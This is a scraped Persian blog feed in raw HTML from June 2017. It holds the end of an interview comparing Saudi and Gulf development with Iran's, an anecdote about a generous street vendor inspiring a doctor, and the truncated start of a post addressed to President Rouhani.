انجام می دهیم.<br> </span></font> <font color="#00B700"> <span style="background-color: #F7F7F7"> متاسفانه نحوه تفکر ما این طور بوده است که همه را دست کم گرفته ایم. فکر کردیم خودمان خیلی جلو هستیم. ما همیشه منتظر شکست خوردن دیگران بودیم و هیچ وقت نیامدیم خودمان را جلو بیندازیم.</span></font><font color="#000099"><span style="background-color: rgb(204, 255, 255)"><br> </span></font> <font color="#0000FF"> <span style="background-color: #F2F2F2"> حتی اگر آنها شکست می خورند، ما باید بازارهای صادراتی آنها را به دست بیاوریم. ما چه اقدامی برای گرفتن بازارهای صادراتی آنها انجام می دهیم؟</span></font><font color="#000099"><span style="background-color: rgb(204, 255, 255)"><br> *بعد از این که کشور قطر را تحریم کردند صادرات میوه و سبزیجات ایران به قطر افزایش پیدا کرده و بیش تر شده.</span></font><font color="#00B700"><span style="background-color: #F7F7F7"> -صادرات این اقلام، عددی نمی شود. کل قطر، سه میلیون نفر جمعیت دارد. ممکن است جمعیت میوه خور آنجا 200 هزار نفر باشد. این جمعیت به اندازه جمعیت یکی از شهرهای ایران است.</span></font><font color="#000099"><span style="background-color: rgb(204, 255, 255)">شما فکر نکنید با این مقدار صادرات، مشکل بیکاری کشور ما حل می شود. البته تاثیر دارد ولی آن قدر نیست.<br> به عنوان کسی که در کارهای برنامه استراتژیک بوده، سال ها کار کرده ام و به دقت دنیا را رصد می کنم، من هر فردی و در هر جای دنیا یک پروژه توسعه ای داشته باشد با دقت رصد می کنم و تلاش می کنم در ایران بگویم این پروژه مهم است و ما مهمتر از آن را درست کنیم. نمی گویم پروژه آنها بیخود است و ما نیز هیچ کاری انجام ندهیم. حرف اصلی من این است.<br> </span></font> <font color="#000099"> <font color="#520088"> <span style="background-color: #FFFFCC">*دوبی و امارات این پیشرفت را در دهه های اخیر داشته اند. چرا عربستان همانند امارات چنین هدفی نداشته و به آن صورت فعالیت نکرده است؟</span></font><span style="background-color: rgb(204, 255, 255)"><br> -مردم عربستان، قبیله ای زندگی می کردند و شرایط خاصی داشته اند. مردم آن، از یک بُعد، قانع هستند. یعنی زندگی شان، یک نوع سنت مذهبی خاصی هست که پنج وعده نماز می خوانند و غذایی می خورند. غذای خوب هم می خورند. برای خودشان هم جشن برگزار می کنند و کارهای خاصی انجام می دهند. تا الان همین چند مورد را کافی می دانستند. یعنی به دنبال توسعه آنچنانی نبودند.<br> اما الان متوجه شده اند با شبکه های اجتماعی و این دنیایی که به همدیگر پیوسته شده است نمی توانند خارج از جامعه جهانی زندگی کنند. مجبورند تغییر ایجاد کنند. تا حالا ضرورت نمی دیدند که تغییر ایجاد کنند.<br> ما فکر می کنیم همه کارها را می توانیم به صورت مستقل انجام بدهیم. همیشه می گوییم خودکفا شویم. ما می گوییم خودمان، خودمان را اداره می کنیم و همین چیزی که هستیم خوب است. اما آنها متوجه شده اند که جهان، این طور نیست.<br> </span><font color="#00B700"> <span style="background-color: #FFFFCC">متوجه شده اند که جهان، پیوسته به هم شده و باید با آن همکاری کرد. در جهان، باید حرف های جدید زد. نحوه زندگی و روش را باید یک مقدار تغییر داد. اگر تغییر ندهیم عقب می مانیم. کسانی که برای آنها فکر می کنند این فکرها را کرده اند. برای همین، به دنبال تغییر هستند.</span></font><span style="background-color: rgb(204, 255, 255)"><br> ما هم به صورت طبیعی تا حدی تغییر کرده ایم. ما اگر 20 سال قبل ایران را با الان مقایسه کنیم متوجه این تغییر می شویم. هم طرز تفکر مردم و هم اقتصاد ما و هم هر چیزی را که نگاه کنیم، می بینیم خیلی تغییر کرده است. تغییری که اتفاق افتاده است چه خوب و چه بد، متاثر از جهان هم بوده است.<br> *در چارچوب سند چشم انداز 2030 عربستان، اعلام کرده اند که 5 درصد از سهام شرکت نفتی آرامکو را به بخش خصوصی می فروشند. مقامات آن دولت گفته اند ارزش این شرکت 2 هزار میلیارد دلار است. فایننشال تایمز که یکی از روزنامه های اقتصادی معروف جهان است گفته این ارزش گذاری خیالی است.<br> </span></font> <font color="#0000FF"> <span style="background-color: #F2F2F2">به همین صورت که فایننشال تایمز در این زمینه گفته خیالی است آیا نکات و برنامه هایی که در آن چشم انداز مطرح شده است خیالی هست یا واقعیت هایی را هم در نظر گرفته اند؟</span></font><font color="#000099"><span style="background-color: rgb(204, 255, 255)"><br> -من به این عدد و رقم اطمینان ندارم. چون واقعا نمی دانم شرکت آرامکو چه دارد که الان بگویم خوب است یا بد است. به طور کلی در آن زمینه اطلاع ندارم و جوابی برای آن ندارم که چطور است ولی من معتقدم که در عربستان به دنبال ایجاد تغییر هستند.<br> </span><span style="background-color: #F2F2F2"> <font color="#00B700">کشور چین هم که ترقی کرد به این صورت بود که نسل جدیدی به قدرت رسیدند و چین، همین چین شد که ما الان می بینیم. در حالی که 30 سال قبل چین وضع خوبی نداشت. درآمد سرانه اش 30 دلار بود. الان به 300 تا 400 دلار رسیده است. درآمد سرانه هر نفر در چین، خیلی زیاد نشده ولی بالاخره 10 برابر شده.</font></span><span style="background-color: rgb(204, 255, 255)"><br> </span><font color="#CE0000"> <span style="background-color: #F2F2F2">درآمد سرانه ما 6 هزار دلار بوده و بعد از چند دهه هنوز در حد همان 6 هزار دلار مانده است.</span></font><span style="background-color: rgb(204, 255, 255)"> یعنی درآمد سرانه کشور ما اضافه نشده. البته وضعیت عمومی مردم ایران بهتر شده. در این موضوع شکی نیست ولی درآمد سرانه افزایش نداشته است.<br> </span></font><span style="background-color: #F7F7F7"> <font color="#00B700"> درآمد سرانه کره جنوبی در چند دهه اخیر 30 برابر شده </font> <font color="#FF0000"> ولی درآمد سرانه ما تکان نخورده است.</font><font color="#00B700"> کره جنوبی در تکنولوژی، تغییر و تحول ایجاد کرده است.&nbsp; ما این کارها را انجام نداده ایم. باید این کارها را دنبال کنیم و همین طور جدی بگیریم.</font></span><font color="#000099"><span style="background-color: rgb(204, 255, 255)"><br> </span></font> <font color="#FFFFFF"> <span style="background-color: #00B700">کارهایی را که دیگران انجام می دهند به شوخی نگیریم. چون اگر به شوخی بگیریم به طور مستمر، خودمان عقب می مانیم.</span></font><font color="#000099"><span style="background-color: rgb(204, 255, 255)"><br> </span></font> <font color="#00B700"> <span style="background-color: #F7F7F7">شما فرودگاه های ما را با همان قطر مقایسه کنید یا با فرودگاه امارات یا فرودگاه ابوظبی در امارات. مشخص است که سرمایه زیادی جذب کرده اند. حالا ما می خواهیم هواپیمای مسافربری جدید بخریم بعضی می گویند هواپیما نخرید و ما به همان هواپیماهایی که داریم قانع باشیم. همیشه می خواهیم محدود به خودمان باشیم. اما نسل جوان، این وضع را نمی پسندد.</span></font><font color="#000099"><span style="background-color: rgb(204, 255, 255)"><br> *توسط بانک جهانی پیش بینی شده که رشد اقتصادی عربستان در سال 2017 به 1.6 درصد برسد و مثلا در سال 2019 به 2.6 درصد. از این طرف محمد بن سلمان گفته که ما مصمیم هستیم کشوری مترقی بسازیم و همچنین گفته چشم انداز ما یک عربستان قوی و مترقی است.<br> </span></font> <font color="#0000FF"> <span style="background-color: #F2F2F2">با این مقدار رشدی که بانک جهانی پیش بینی کرده است واقعا ترقی می تواند در عربستان اتفاق بیفتد؟</span></font><font color="#000099"><span style="background-color: rgb(204, 255, 255)"><br> -رشد یک و نیم درصد، رشد کمی برای آنها نیست. در زمان بررسی رشد اقتصادی، مقدار تورم را نیز باید در نظر گرفت. </span> <font color="#00B700"><span style="background-color: #F2F2F2"> وقتی تورم کشوری در حد صفر است اگر یک درصد رشد اقتصادی داشته باشد این مقدار رشد، قابل توجه است. ژاپن مگر چقدر رشد می کند. همیشه زیر یک درصد رشد اقتصادی دارد و رشد آن در حد دهم درصد است.</span></font><span style="background-color: rgb(204, 255, 255)"><br> آمریکا در سال 2015 در حد 1.4 درصد رشد اقتصادی داشته است. وقتی ارزش دلار ثابت می ماند آن یک درصد رشد، رشد خوبی است. در اقتصاد آنها ارزش پول ثابت می ماند. بنابراین اقتصاد آنها&nbsp; با اقتصاد ما فرق می کند. وقتی یک درصد رشد می کنند رشد بالایی است.<br> </span><font color="#0000FF"> <span style="background-color: #FFFFCC">اگر بانک جهانی گفته رشد عربستان از 1.6 درصد به 2.6 درصد خیلی مهم است. این افزایش مقدار رشد در سال 2019 نسبت به سال 2017، قابل توجه است.<br> اگر تعارف نکنیم پایه های اقتصادی آنها نسبتا مستحکم است. به لحاظ سرمایه ثابت عدد قابل ملاحظه ای است چون پس انداز دارند. شوخی نیست 600 میلیارد دلار ذخیره ارزی. برای کشوری که 27 میلیون نفر جمعیت دارد رقم ناچیزی نیست.</span></font><span style="background-color: rgb(204, 255, 255)"><br> اگر کشوری بخواهد فقط نان بخورد و روز را بگذراند و نخواهد ترقی کند، این 600 میلیارد دلار&nbsp; می تواند تا 100 سال جواب بدهد.<br> خواهش می کنم شما به نحوی نشان بدهید که ما این کار را جدی بگیریم. اینقدر نگوییم اینها هیچی نیستند و سر خودمان را شیره بمالیم. حتی اگر آنها در نهایت موفق نشوند، خُب نشده اند. اما اگر موفق شوند، چطور. پس ما اقلا نباید عقب بیفتیم.<br> *در چارچوب بحث های چشم انداز 2030 عربستان، گفته اند که آموزش عالی که انجام می شود متناسب با نیاز بازار کار باشد.</span></font><span style="background-color: rgb(204, 255, 255)"><font color="#FF0000"> در یکی از رتبه بندی دانشگاه های جهان که در سال های اخیر انجام شده است دانشگاه های عربستان بالاتر از دانشگاه های ایران قرار گرفته اند.</font><font color="#000099"><br> </font> </span></font><font size="4"><font size="3" face="Mihan-IransansBold"> <font color="#0000FF"> <span style="background-color: #F2F2F2">در رتبه بندی کیو اس(QS)&nbsp; دانشگاه شریف ایران رتبه 650 را در جهان به دست آورده ولی دانشگاه نفت و مواد معدنی ملک فهد عربستان در رتبه 216 و دانشگاه ملک سعود عربستان در رتبه 253 در بین دانشگاه های جهان بوده اند این دانشگاه های عربستان حدود 400 رتبه جلوتر از دانشگاه شریف ایران هستند. از لحاظ علمی با آن دانشگاه ها به معنای واقعی پیشرفت کرده اند؟</span></font><font color="#000099"><span style="background-color: rgb(204, 255, 255)"><br> -استاد آن دانشگاه های عربستان، خارجی است. البته دانشجویان آن دانشگاه ها، عمدتا&nbsp; اهل همان کشور هستند. دولت عربستان سرمایه گذاری زیادی انجام می دهد. همان استادان دانشگاه های ام آی تی(موسسه فناوری ماساجوست/ MIT) و استنفورد و بهترین دانشگاه های جهان را به عربستان می آورند و در نتیجه رتبه دانشگاه های عربستان بالا می رود.<br> </span><font color="#00B700"> <span style="background-color: #FFFFCC">البته رتبه دانشگاه های آنها بالا رفته است و دروغ نیست. اما این که آیا با این سیاست هایی که دارند می توانند از این پتانسیلی که ایجاد کرده اند استفاده کنند، جواب من خیر است.</span></font><span style="background-color: rgb(204, 255, 255)"><br> </span><font color="#00B700"> <span style="background-color: #F7F7F7">در جایی مثل کشور ما، استادان ایرانی دارند توان کشور را بالا می برند. این خیلی مهم است ولی آن رتبه دانشگاه های عربستان درست است و در رتبه های 200 هستند. اما خوبی دانشگاه های ما در ایران این است که ما خودمان، داریم زحمت می کشیم و توانمندی داریم. سیستمی که ما را اداره می کند یعنی وزارت علوم یا دولت یا فلان، عُرضه استفاده مناسب از ما را ندارد.</span></font><span style="background-color: rgb(204, 255, 255)"><br> </span></font> <font color="#FFFFFF"> <span style="background-color: #00B700">ما می توانیم خودمان کاری کنیم و طرح داریم ولی مدیریت ما ضعیف است.</span></font><font color="#000099"><span style="background-color: rgb(204, 255, 255)"> در کشوری مثل عربستان، مدیریت شان را به دست کارشناسان کشورهای دیگر سپرده اند. آنها طرح و برنامه می دهند و پروژه اجرا می کنند. افکارشان را توانسته اند به جایی برسانند که یک نفر چنین طرح های بلند پروازانه ای ارائه می کند.<br> چون عربستان امکانات مالی هم دارد قطعا می تواند اجرا کند. یعنی فقط حرف نیست. قطعا عمل در پشت آن قرار دارد.<br> *بالاترین رتبه ای که دانشگاه های عربستان آورده اند توسط دانشگاه نفت و مواد معدنی ملک فهد کسب شده و رتبه 216 در بین دانشگاه هیا جهان بوده است. در این دانشگاه تدریس به زبان انگلیسی است.<br> -حتی استادان ایرانی در آنجا مشغول به کار هستند. خدمات خوب و سرویس های بسیار خوب به استادان می دهند.<br> </span></font> <font color="#0000FF"> <span style="background-color: #F2F2F2">*می شناسید استادان ایرانی که در آن دانشگاه های فعالیت دارند؟</span></font><font color="#000099"><span style="background-color: rgb(204, 255, 255)"><br> -در سایت های اینترنتی آن دانشگاه ها، اسامی استادان ایرانی وجود دارد. پروفسوری ایرانی را می شناسم که برای برگزار کردن کارگاه های علمی و استارت آپ های[همایش کارآفرینی و سازمان موقت] مربوط به نفت به آنجا می رود. یک آدم برجسته است که البته گاهی اوقات به ایران هم می آید و این طور نیست که فقط به عربستان برود.<br> </span></font> <font color="#0000FF"> <span style="background-color: #F2F2F2">*در دانشگاه نفت و مواد معدنی ملک فهد عربستان رشته های هوافضا و کامپیوتر و مدریت تدریس می شود. یک دانشگاه بین المللی است و زبان تدریس، انگلیسی است. از لحاظ کیفیت تحصیل، دانشجویانی که در آنجا آموزش می بینند نیروهای کیفی هستند؟</span></font><font color="#000099"><span style="background-color: rgb(204, 255, 255)"><br> -من که در آنجا نیستم ولی به طور علمی به قضایا نگاه می کنم تعجب می کنم یک عده از دانشمندان دنیا به یک دانشگاه بروند ولی کاری انجام ندهند. قطعا کسانی که به آنجا به طور جدی کار می کنند و کاری با حکومت آن ندارند.<br> شما مطمئن باشید از نظر علمی، مشکلی ندارند. از نظر علمی مثل این است که بنده، پتانسیل زیادی دارم ولی آیا کشور می تواند از وجود من استفاده کند؟ در اینجا نمی تواند و در عربستان هم همین طور است. ممکن است پتانسیل ها وجود داشته باشد ولی نمی توانند به خوبی استفاده کنند.</span></font></font><br> &nbsp;</font></div> </div> </div> </div> <div style="text-align: justyfy" dir="rtl"> <div style="text-align: right" dir="rtl"> <font size="5" face="Latha"> <span style="text-decoration: overline; background-color: #FFFFCC"> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-style: normal; font-variant: normal; line-height: 56px; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <p style="line-height: 200%; margin-top: 0; margin-bottom: 0" dir="rtl" align="right"> <font color="#520088"> <span style="font-weight: 700; background-color: #F2F2F2"> <font face="Arial" color="#0000FF">&nbsp;</font></span></font><span style="font-weight: 700; background-color: #F2F2F2"><font color="#0000FF"> </font><font face="Arial" color="#0000FF">تهیه وَ تدوین: عـبـــد عـا صـی </font> </span></p> </b> </span></font> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> </b></div><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> </b></div><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> </b> </b> </strong> </div></div></div> <b></b> <font style="font-size:8pt;"> <br> <font size="3"><b>برچسب ها: <a href="/post/tag/پیشرفت کشورهای عربی خلیج فارس">پیشرفت کشورهای عربی خلیج فارس</a>، <a href="/post/tag/پیشرفت ایران">پیشرفت ایران</a>، <a href="/post/tag/نخبگان">نخبگان</a>، <a href="/post/tag/مدیریت ضعیف ایران">مدیریت ضعیف ایران</a>،</b></font><br><br> </font> </div> text/html 2017-06-27T13:11:01+01:00 1001SHAYADOBAYAD.mihanblog.com عـبـــد عـا صـی شما چه کاره-اید!؟ http://1001SHAYADOBAYAD.mihanblog.com/post/3528 <div class="xpost2"><div style="float:right"></div> <div id="InPost_MihanblogShopAds" style="display:block;height:0px;width:100%;border:0px"></div> <div class="xpost2"> <div dir="RTL" style="line-height: 200%; margin: 0" align="right"> <b> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2"> <div class="xpost2" style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div style="text-align: right" dir="rtl"> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <strong> <div class="xpost2"> <div class="xpost2" style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <p dir="rtl" style="line-height: 36px; margin-top: 0px; margin-bottom: 0px" align="justify"> &nbsp;</p> <p dir="rtl" style="line-height: 36px; margin-top: 0px; margin-bottom: 0px" align="justify"> <span style="color: #FFFFFF; font-family: Microsoft Sans Serif; font-size: large; font-weight: 700; background-color: #00B700"> &nbsp; بسم الله الرحمن الرحیم &nbsp;</span></p></div> </div> </strong></b> </div> </div> </div> </div> </div> </b> </div> <strong> <b style="color: rgb(68, 68, 68); font-family: Arial; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: 45pxl; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> </b> </strong><div dir="RTL" style="line-height: 200%; margin: 0" align="right"><strong> <b> <h2 class="title"> <span style="text-decoration: overline blink; letter-spacing: 3pt; vertical-align: bottom; background-color: #FFFFCC"> <font size="6" face="Arial"><u><font color="#00B700">&nbsp;&nbsp;&nbsp; </font></u> <a title=" راستى یک سوال : شغل شما چیست؟" href="http://story-short.blogfa.com/post-318.aspx"> <font color="#00B700">&nbsp;شما چه کاره-اید!؟&nbsp; </font></a></font> </span></h2> </b> <p style="line-height: 90px; margin-top: 0; margin-bottom: 0"> <b> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: rgb(183, 152, 105)"> <span style="background-color: rgb(255, 255, 0)"> <font size="5" face="Arial" color="#0000ff"><br></font></span></b></b></b></p><p style="line-height: 90px; margin-top: 0; margin-bottom: 0"><b><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: rgb(183, 152, 105)"><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff">&nbsp; <span lang="fa">جهت مراجعه به&nbsp;</span></font></span></b><span lang="fa"><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: #E3FFFF"><font size="5" face="Arial" color="#0033cc">مرجع متن</font></b><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: rgb(183, 152, 105)"><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff">، یا&nbsp;</font></span></b><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: #E3FFFF"><font size="5" face="Arial" color="#0033cc">عنوان اصلی</font></b><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff"><b style="line-height: normal; ">، به پیوند فوق اشاره</b></font></span></span><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff"><b style="line-height: normal; "> کنید <span lang="fa">&nbsp;</span></b></font></span></b></b></p><b><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"><font size="5" face="Microsoft Sans Serif" color="#0033CC"> </font> </b> </b></strong><div dir="RTL" style="line-height: 200%; margin: 0" align="justify"><strong><b> <div class="context"> <p style="text-align: justify"> <span style="background-color: #F2FFFF"> <font size="4" face="Microsoft Sans Serif" color="#0000FF">&nbsp;من دکتر س.ص متخصص اطفال هستم ... سال ها قبل چکی از بانک نقد کردم و بیرون آمدم، کنار بانک دستفروشی بساط باطری، ساعت، فیلم و اجناس دیگری پهن کرده بود.دیدم مقداری هم سکه دو ریالی در بساطش ریخته است... آن زمان تلفن های عمومی با سکه های دو ریالی کار می کردند؛ جلو رفتم یک تومان به او دادم و گفتم دو ریالی بده... او با خوشرویی پولم را با دو سکه بهم پس داد و گفت : این ها صلواتی است!!! <img style="display: block" src="http://cdn.asriran.com/files/fa/news/1392/10/16/324280_162.jpg" vspace="10" align="right" hspace="10" height="345" border="0" width="500"></font></span></p> <p style="text-align: justify">&nbsp;<font size="4" face="Microsoft Sans Serif" color="#0000FF"><span style="background-color: #F2FFFF">گفتم : یعنی چه؟ گفت : برای سلامتی خودت صلوات بفرست و سپس به نوشته روی میزش اشاره کرد. (دو ریالی صلواتی موجود است). باورم نشد، ولی چند نفر دیگر هم مراجعه کردند و به آنها هم… گفتم : مگر چقدر درآمد داری که این همه دو ریالی مجانی می دهی؟ با کمال سادگی گفت : ۲۰۰تومان که ۵۰ تومان آن را در راه خدا و برای این که کار مردم راه بیفتد دو ریالی می گیرم و صلواتی می دهم ... مثل اینکه سیم برق به بدنم وصل کردند، بعد از یک عمر که برای پول دویدم و حرص زدم، دیدم این دست فروش از من خوشبخت تر است؛ که یک چهارم از مالش را برای خدا می دهد، در صورتی که من تاکنون به جرأت می توانم بگویم یک قدم به راه خدا نرفتم و یک مریض مجانی نیز نپذیرفتم!!! احساساتی شدم و دست کردم ده تومان به طرف او گرفتم. آن جوان با لبخندی مملو از صفا گفت : برای خدا دادم که شما را خوشحال کنم. این بار یک اسکناس صد تومانی به طرفش گرفتم و او باز همان حرفش را تکرار کرد..! من که خیلی مغرور تشریف دارم مثل یخی در گرمای تابستان آب شدم… به او گفتم : چه کاری می توانم بکنم؟ گفت : خیلی کارها آقا! شغل شما چیست؟ گفتم: پزشکم؛ گفت : آقای دکتر شب های جمعه در مطب را باز کن و مریض صلواتی بپذیر... نمی دانید چقدر ثواب دارد! صورتش را بوسیدم و در حالی که گریان شده بودم، خودم را درون اتومبیلم انداختم و به منزل رفتم. دگرگون شده بودم، ما کجا این ها کجا؟! از آن روز دادم تابلویی در اطاق انتظار مطبم نوشتند با این مضمون؛ "شب های جمعه مریض صلواتی می پذیریم"... دوستان و آشنایان طعنه ام زدند، اما گفته های آن دست فروش در گوشم همیشه طنین انداز بود : با خدا معامله کن خدا پولت را چند برابر می کند و خودت نمی فهمی! راستى یک سوال : شغل شما چیست؟</span></font></p> <p style="text-align: justify">&nbsp;</p> <p style="text-align: right"><font size="4" color="#0000FF"> <span style="background-color: #FFFF00">&nbsp;&nbsp; ارسالی خانم شهبازی&nbsp;</span></font></p></div> <p style="line-height: 55px; margin-top: 0; margin-bottom: 0"> <font size="4" face="Microsoft Sans Serif" color="#0000FF"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"> <span style="vertical-align: bottom; letter-spacing:1pt"> &nbsp;</span></b></font></p> <div style="text-align: justyfy" dir="rtl"> <div style="text-align: right" dir="rtl"> <font size="5" face="Latha"> <span style="text-decoration: overline; background-color: #FFFFCC"> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-style: normal; font-variant: normal; line-height: 56px; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <p style="line-height: 200%; margin-top: 0; margin-bottom: 0" dir="rtl" align="right"> <font color="#520088"> <span style="font-weight: 700; background-color: #F2F2F2"> <font face="Arial" color="#0000FF">&nbsp;</font></span></font><span style="font-weight: 700; background-color: #F2F2F2"><font color="#0000FF"> </font><font face="Arial" color="#0000FF">تهیه وَ تدوین: عـبـــد عـا صـی </font> </span></p> </b> </span></font> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <blockquote> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <b> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> &nbsp;</div> </div> </div> </div> </b> </div> </div> </blockquote> </b></div><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> </b></div><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> </b> </b> </strong> </div></div></div> <b></b> <font style="font-size:8pt;"> <br> <font size="3"><b>برچسب ها: <a href="/post/tag/معامله با خدا">معامله با خدا</a>، <a href="/post/tag/صلواتی">صلواتی</a>، <a href="/post/tag/کردار نیک">کردار نیک</a>،</b></font><br><br><br><br></font> </div> text/html 2017-06-26T17:15:08+01:00 1001SHAYADOBAYAD.mihanblog.com عـبـــد عـا صـی آقای روحانی اگر زورتان به کله-گنده-ها نمیرسد ... http://1001SHAYADOBAYAD.mihanblog.com/post/3527 <div class="xpost2"><div style="float:right"></div> <div id="InPost_MihanblogShopAds" style="display:block;height:0px;width:100%;border:0px"></div><br><br><font color="#009900"><span style="background-color: rgb(255, 255, 204);"><b><font size="6" face="arial,helvetica,sans-serif"><a href="http://www.khabaronline.ir/detail/680084/weblog/mohajeri">&nbsp;&nbsp;&nbsp; آقای روحانی اگر زورتان به کله-گنده-ها نمیرسد ...&nbsp;&nbsp;&nbsp; </a></font></b></span></font><br><br><br><div class="leadCont"> <p align="justify"> <br> <strong> </strong></p><p style="line-height: 90px; margin-top: 0; margin-bottom: 0"><strong> <b> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: rgb(183, 152, 105)"> <span style="background-color: rgb(255, 255, 0)"> <font size="5" face="Arial" color="#0000ff">&nbsp;&nbsp;<span lang="fa">جهت مراجعه به&nbsp;</span></font></span></b><span lang="fa"><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: #E3FFFF"><font size="5" face="Arial" color="#0033cc">مرجع متن</font></b><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: rgb(183, 152, 